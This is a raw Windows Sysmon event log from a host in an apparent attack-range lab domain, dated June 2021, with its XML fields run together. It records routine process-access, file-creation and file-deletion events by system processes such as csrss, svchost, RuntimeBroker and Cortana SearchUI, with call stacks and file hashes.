21:06:49.946{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0C05-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.946{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A269-60D3-0C05-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:49.884{4DB9351A-A269-60D3-0905-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\162c-0\XamlBuildTask.dll2021-06-23 21:06:49.884 23542300x800000000000000022383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.868{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB571F5390F2A592975D660269DC824C,SHA256=9239245E4D18102E7D69F9A34DD45DFCC8E9B6651A75811D7146542A1C8A52D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.785{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.785{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.773{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.773{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x800000000000000022378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.773{4DB9351A-9F49-60D3-DF00-00000000CF01}5948ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\Y4WA5EJR\microsoft.windows[1].xmlMD5=07742C9FE0A4AA03CF91B78A3EAD6FD5,SHA256=27BB4ACB6326CFA13FB3D021E3763BD67CB313693BE92D441DC2717E4CBBB5F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.761{4DB9351A-9DDE-60D3-1600-00000000CF01}12921388C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0B05-00000000CF01}4844C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.761{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0B05-00000000CF01}4844C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.744{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.744{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.744{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0B05-00000000CF01}4844C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.744{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0B05-00000000CF01}4844C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.744{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0B05-00000000CF01}4844C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.744{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0B05-00000000CF01}4844C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.666{4DB9351A-9DDE-60D3-1600-00000000CF01}12921388C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0A05-00000000CF01}6412C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.650{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0A05-00000000CF01}6412C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.650{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0A05-00000000CF01}6412C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000022366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.635{4DB9351A-9F49-60D3-DF00-00000000CF01}5948ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\Y4WA5EJR\microsoft.windows[1].xmlMD5=07742C9FE0A4AA03CF91B78A3EAD6FD5,SHA256=27BB4ACB6326CFA13FB3D021E3763BD67CB313693BE92D441DC2717E4CBBB5F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.635{4DB9351A-9F49-60D3-DF00-00000000CF01}5948ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\Y4WA5EJR\microsoft.windows[1].xmlMD5=C1DDEA3EF6BBEF3E7060A1A9AD89E4C5,SHA256=B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.635{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0A05-00000000CF01}6412C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.635{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.635{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x800000000000000022361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.635{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0A05-00000000CF01}6412C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.635{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0A05-00000000CF01}6412C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36dd2|c:\windows\system32\rpcss.dll+3dbed|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.603{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0905-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.572{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0905-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 